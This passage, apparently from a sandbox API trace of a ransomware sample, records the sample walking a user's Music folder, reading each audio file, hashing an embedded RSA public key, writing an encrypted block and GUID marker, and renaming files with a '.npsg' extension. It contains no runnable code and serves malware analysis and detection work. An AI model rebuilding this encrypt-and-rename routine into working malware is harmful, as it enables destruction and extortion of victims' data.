(HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400470 | out: hHeap=0x620000) returned 1 [0237.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400458 | out: hHeap=0x620000) returned 1 [0237.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004b8 | out: hHeap=0x620000) returned 1 [0237.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0237.028] GetCurrentThreadId () returned 0x5b4 [0237.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79bb8 [0237.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0237.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.028] GetCurrentThreadId () returned 0x5b4 [0237.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004b8 [0237.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400458 [0237.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400470 [0237.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400440 [0237.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34004d0 [0237.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004a0 [0237.031] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xecb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.031] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.031] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.031] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.032] CloseHandle (hObject=0x644) returned 1 [0237.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b81cd0 [0237.034] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MMJjf08EkmSTh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mmjjf08ekmsth.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MMJjf08EkmSTh.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mmjjf08ekmsth.m4a.npsg")) returned 1 [0237.036] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2ea1a0, ftCreationTime.dwHighDateTime=0x1d5bfea, ftLastAccessTime.dwLowDateTime=0xb4eea080, ftLastAccessTime.dwHighDateTime=0x1d5c5f3, ftLastWriteTime.dwLowDateTime=0xb4eea080, ftLastWriteTime.dwHighDateTime=0x1d5c5f3, nFileSizeHigh=0x0, nFileSizeLow=0xfb0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sT-eqZP_KQzCD.wav", cAlternateFileName="ST-EQZ~1.WAV")) returned 1 [0237.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0237.036] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sT-eqZP_KQzCD.wav") returned=".wav" [0237.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sT-eqZP_KQzCD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\st-eqzp_kqzcd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.037] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=64267) returned 1 [0237.037] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.040] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xfae5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.040] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.042] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xfb0b, lpOverlapped=0x0) returned 1 [0237.044] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.044] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.044] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.044] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0237.045] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.045] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.045] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.045] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.045] GetLastError () returned 0x0 [0237.045] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.045] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0237.045] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.046] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.046] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.046] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90a38 [0237.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b81cd0 [0237.047] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xfb0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.047] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.047] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.047] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.047] CloseHandle (hObject=0x644) returned 1 [0237.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b81cd0 [0237.049] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sT-eqZP_KQzCD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\st-eqzp_kqzcd.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sT-eqZP_KQzCD.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\st-eqzp_kqzcd.wav.npsg")) returned 1 [0237.051] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe28078d0, ftCreationTime.dwHighDateTime=0x1d5bbb6, ftLastAccessTime.dwLowDateTime=0xb4184e80, ftLastAccessTime.dwHighDateTime=0x1d5bdc0, ftLastWriteTime.dwLowDateTime=0xb4184e80, ftLastWriteTime.dwHighDateTime=0x1d5bdc0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZmlmXoAngk", cAlternateFileName="ZMLMXO~1")) returned 1 [0237.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0237.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c898 [0237.051] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447f02e0, ftCreationTime.dwHighDateTime=0x1d5b649, ftLastAccessTime.dwLowDateTime=0x13b4b140, ftLastAccessTime.dwHighDateTime=0x1d5b9f6, ftLastWriteTime.dwLowDateTime=0x13b4b140, ftLastWriteTime.dwHighDateTime=0x1d5b9f6, nFileSizeHigh=0x0, nFileSizeLow=0x16758, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZqB0wDY39.mp3", cAlternateFileName="ZQB0WD~1.MP3")) returned 1 [0237.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0237.051] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZqB0wDY39.mp3") returned=".mp3" [0237.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZqB0wDY39.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zqb0wdy39.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.052] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=91992) returned 1 [0237.052] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.055] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16732, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.055] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.057] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x16758, lpOverlapped=0x0) returned 1 [0237.059] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.059] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.059] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.059] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0237.060] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.060] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.060] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.060] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.060] GetLastError () returned 0x0 [0237.060] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.060] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0237.060] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.061] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.061] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.061] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90a38 [0237.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b81cd0 [0237.062] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16758, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.062] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.062] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.062] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.063] CloseHandle (hObject=0x644) returned 1 [0237.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b81cd0 [0237.065] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZqB0wDY39.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zqb0wdy39.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZqB0wDY39.mp3.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zqb0wdy39.mp3.npsg")) returned 1 [0237.067] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447f02e0, ftCreationTime.dwHighDateTime=0x1d5b649, ftLastAccessTime.dwLowDateTime=0x13b4b140, ftLastAccessTime.dwHighDateTime=0x1d5b9f6, ftLastWriteTime.dwLowDateTime=0x13b4b140, ftLastWriteTime.dwHighDateTime=0x1d5b9f6, nFileSizeHigh=0x0, nFileSizeLow=0x16758, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZqB0wDY39.mp3", cAlternateFileName="ZQB0WD~1.MP3")) returned 0 [0237.067] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0237.067] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0237.067] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.068] RtlAllocateHeap 